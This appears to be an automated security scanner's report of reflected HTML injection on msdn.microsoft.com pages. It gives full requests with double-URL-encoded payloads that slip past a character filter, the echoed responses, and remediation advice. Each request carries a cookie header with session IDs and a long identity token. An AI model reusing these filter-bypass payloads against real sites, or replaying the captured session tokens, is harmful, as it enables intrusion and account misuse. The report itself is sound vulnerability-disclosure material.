The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ff921345.aspx3fc4f%2522%253e%253ca%253ea5cb942ec49 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ff921345.aspx3fc4f"><a>a5cb942ec49" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87f9c%2522%253e%253ca%253e4444cb60aed was submitted in the REST URL parameter 1. This input was echoed as 87f9c"><a>4444cb60aed in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us87f9c%2522%253e%253ca%253e4444cb60aed/library/ms123401.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us87f9c"><a>4444cb60aed/library/ms123401" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48b6c%2522%253e%253ca%253ea82109ceb41 was submitted in the REST URL parameter 2. This input was echoed as 48b6c"><a>a82109ceb41 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library48b6c%2522%253e%253ca%253ea82109ceb41/ms123401.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library48b6c"><a>a82109ceb41/ms123401" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3898%2522%253e%253ca%253e4b48fd0aba8 was submitted in the REST URL parameter 3. This input was echoed as c3898"><a>4b48fd0aba8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms123401.aspxc3898%2522%253e%253ca%253e4b48fd0aba8 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:30 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms123401.aspxc3898"><a>4b48fd0aba8" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d4f%2522%253e%253ca%253e3bf87eee46 was submitted in the REST URL parameter 1. This input was echoed as 16d4f"><a>3bf87eee46 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us16d4f%2522%253e%253ca%253e3bf87eee46/library/ms376734.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:55 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us16d4f"><a>3bf87eee46/library/ms376734" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1de4%2522%253e%253ca%253e15de1465623 was submitted in the REST URL parameter 2. This input was echoed as b1de4"><a>15de1465623 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryb1de4%2522%253e%253ca%253e15de1465623/ms376734.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:08 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryb1de4"><a>15de1465623/ms376734" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5baf%2522%253e%253ca%253ed814d454776 was submitted in the REST URL parameter 3. This input was echoed as f5baf"><a>d814d454776 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms376734.aspxf5baf%2522%253e%253ca%253ed814d454776 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; 